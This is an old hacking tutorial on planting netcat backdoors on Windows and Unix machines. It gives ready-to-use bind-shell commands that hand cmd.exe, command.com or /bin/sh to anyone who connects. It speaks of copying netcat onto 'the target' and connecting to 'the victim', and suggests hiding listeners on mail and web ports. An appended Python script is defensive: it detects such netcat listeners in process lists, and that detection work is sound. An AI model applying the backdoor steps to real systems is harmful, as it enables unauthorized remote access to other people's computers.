GUIDE to (mostly) Harmless Hacking: "Backdoors With Netcat"

This guide covers Windows XP, 2000, NT, ME, 98, 95 and our favorite: Unix/Linux!

by Steven Welch with additions from Carolyn Meinel

Netcat, a networking security tool from the l0pht, can be used to set up backdoors (ways of getting back into a compromised system). The netcat backdoor discussed in this GTMHH is one based on Windows NT that also appears in a GTMHH written by keydet in the MS Only Series. Thank you keydet!

Before I discuss the backdoor, let me tell you a few lines about myself:

1) I'm not in any way close to being an Uberhacker. The thought of me being one just doesn't go with humanity, for I've only been hacking for about a year.
2) I'm still in school, so don't expect me to always be able to return your e-mails.

Table of Contents:
1. The Problem
2. How the Backdoor Works
3. Getting the Backdoor to Work on Windows 95/98/ME
4. Getting the Backdoor to Work on Unix/Linux

1. The Problem

Here's what this whole guide is about: getting the backdoor to work on more than just Windows NT/2000/XP. When I first saw the guide on breaking into NT, I hurried up and viewed it. I began reading and it said something like, "This also works with 2000 and XP!" I thought to myself, "Now that's not right! What about Windows 95/98/ME and Unix!" So I read on to see how the backdoor worked, in order to set off toward my goal of a multi-operating-system backdoor.

2. How the Backdoor Works - On Windows NT/2000/XP

For the backdoor, you'll need netcat for Windows (which means you'll need a Windows box, too), which you can get from @stake. Look for the network tools; that's where you'll find netcat. You should also know how to make batch files, which you can learn in the MS Only Series from keydet in the GTMHH.

Sublimely Suggested:

Know everything else there is to know in all of the GTMHH!

First, get the netcat executable file (nc.exe) onto the target's
c:\windows\system32 directory. Then make a batch file with the following command in it:

nc -L -d -p <backdoor port of choice> -t -e cmd.exe

Here's what that command does:
nc - tells Windows to run the nc.exe file with the following arguments:
-L Tells netcat to not close and wait for connections
-d Tells netcat not to open a Window when running
-p Specifies a port to listen for a connection on
-t Tells netcat to accept telnet connections
-e Tells what program to run once the port is connected to

Put the batch file in the c:\windows\system32 directory also and run it.

Once that batch file is run, you can telnet or use netcat in client mode to connect to it. Here's how to use netcat to connect to it:
In a DOS prompt, give the command

C:\WINDOWS\> nc -v <IP Address of victim> <port you chose>

Once you've connected to that port on the victim's computer, you'll have a DOS prompt from which you can give any command on the victim's computer.

The backdoor will close whenever the victim shuts down their computer. To get it running again, just run the batch file.

3. Getting the Backdoor to Work on Windows 95/98/ME

After reading, I thought to myself, "Now why can't I get that to
work on 95/98/ME? Hmm... let's see here..." Then I thought about how the commands worked and came up with a solution.

First, put the nc.exe file in the c:\windows directory. Why? I'll explain later. Put the batch file there, too, but change the batch file's command to:

nc -L -d -p <port of choice> -t -e command.com

There ya go - it'll work on 95/98/ME. Here's why:

First off, you don't need to put the files in the system32 directory, because 95/98/ME doesn't use execute paths the way NT does. If you hadn't put the files in the System32 directory on NT, the batch file wouldn't have executed the program, because it wouldn't have been in the file path; you don't have to worry about that in 95/98/ME. The reason we put the files in the c:\windows directory on 95/98/ME is that this is where the command.com file, the MS-DOS Prompt program, lives. (It's cmd.exe on NT/2000/XP.) That's why we ran command.com instead of cmd.exe.

4. Getting the Backdoor to Work on Unix/Linux

Ok, first off, get the Unix version of netcat onto the target system. Now, simply execute the following command on that system:

nc -nvv -l -p <port of choice> -e /bin/sh

For best results, put that command in a shell script. It's also a good idea to run the command on more than one port, and to use ports belonging to well-known services, such as mail (port 25) and web (port 80).

How does this work? Let's examine:

-nvv I'm not exactly sure what this does. Further research is required...
-l stay open and listen
-p what port to listen to
-e /bin/sh spawns a shell. Or could use bash, tcsh, ksh etc. instead of sh for the shell of your choice.
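Both backdoor forms on this page, the Windows one from section 2 and the Unix one from section 4, leave the same footprint on the host: a process named after netcat, holding a listening socket, whose command line hands a shell to -e. The following is an added example, not part of the original guide, of a small Python checker that scans process-list text for exactly that pattern. The process list is a constructed sample that mixes the Unix and Windows command lines so both are exercised in one run; the sets of netcat binary names and shell names are assumptions that a defender would extend from their own environment.

```python
"""Added example: flag netcat processes that listen and hand a shell to -e.

Input is plain process-list text of the form "<PID> <command line>", as
produced by `ps -eo pid,args` on Unix; the sample below is constructed for
this page and mixes the Unix and Windows forms so both can be checked.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Assumed binary names netcat usually runs under; extend from your own inventory.
NETCAT_NAMES = {"nc", "nc.exe", "netcat", "ncat", "ncat.exe"}
# Interpreters the page hands to -e, plus the shells its Unix section mentions.
SHELLS = {"cmd.exe", "command.com", "sh", "bash", "tcsh", "ksh"}


@dataclass
class Finding:
    pid: int
    port: Optional[int]   # None when no -p or positional port was given
    shell: str
    cmdline: str


def _basename(path: str) -> str:
    """Last path component, treating both / and \\ as separators, lowercased."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def _expand_flags(tokens: List[str]) -> List[str]:
    """Split combined short flags (e.g. -nvv -> -n -v -v) so each can be tested alone."""
    out: List[str] = []
    for t in tokens:
        if re.fullmatch(r"-[A-Za-z]{2,}", t):
            out.extend("-" + c for c in t[1:])
        else:
            out.append(t)
    return out


def analyze_cmdline(cmdline: str) -> Optional[Tuple[Optional[int], str]]:
    """Return (port, shell) if cmdline is a listening netcat that execs a shell, else None."""
    tokens = _expand_flags(cmdline.split())
    if not tokens or _basename(tokens[0]) not in NETCAT_NAMES:
        return None
    args = tokens[1:]
    # -l is the Unix listen flag; -L is the Windows build's listen-and-re-listen flag.
    listening = "-l" in args or "-L" in args
    port: Optional[int] = None
    shell: Optional[str] = None
    for i, a in enumerate(args):
        nxt = args[i + 1] if i + 1 < len(args) else ""
        if a == "-p" and nxt.isdigit():
            port = int(nxt)
        elif a == "-e" and _basename(nxt) in SHELLS:
            shell = nxt
    if port is None:
        # Newer netcats also take the port positionally, e.g. "nc -l 4444".
        positional = [t for t in args if t.isdigit()]
        if positional:
            port = int(positional[-1])
    if listening and shell is not None:
        return port, shell
    return None


def scan_process_list(lines: List[str]) -> List[Finding]:
    """Scan "<PID> <command line>" lines; the header and malformed lines are skipped."""
    findings: List[Finding] = []
    for line in lines:
        parts = line.strip().split(None, 1)
        if len(parts) != 2 or not parts[0].isdigit():
            continue
        hit = analyze_cmdline(parts[1])
        if hit:
            port, shell = hit
            findings.append(Finding(int(parts[0]), port, shell, parts[1]))
    return findings


# Constructed sample, not real output: Unix lines in "ps -eo pid,args" form,
# plus the Windows command from section 2 written the same way.
SAMPLE_PS = """\
  PID COMMAND
    1 /sbin/init
  512 /usr/sbin/sshd -D
 2231 nc -nvv -l -p 8080 -e /bin/sh
 2240 nc -l -p 2222
 2301 C:\\windows\\system32\\nc.exe -L -d -p 4444 -t -e cmd.exe
 2400 nc -v 10.0.0.5 80
"""

if __name__ == "__main__":
    for f in scan_process_list(SAMPLE_PS.splitlines()):
        print(f"pid {f.pid}: netcat listening on port {f.port} spawning {f.shell}: {f.cmdline}")
```

Run it against any listing that gives a PID and the full command line; the plain listener on port 2222 and the client-mode connection to port 80 are deliberately not reported, since neither hands out a shell. A renamed binary defeats the name check, so in practice this kind of command-line rule is paired with a socket-to-process mapping that asks which process owns each unexpected listening port.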

So, let's see what we've learned overall:

Netcat is a useful hacker's tool that can set up backdoors. That says it all.

Thanks for reading!

Steven Lee Welch

With additions from Carolyn Meinel.


© 2013 Happy Hacker All rights reserved.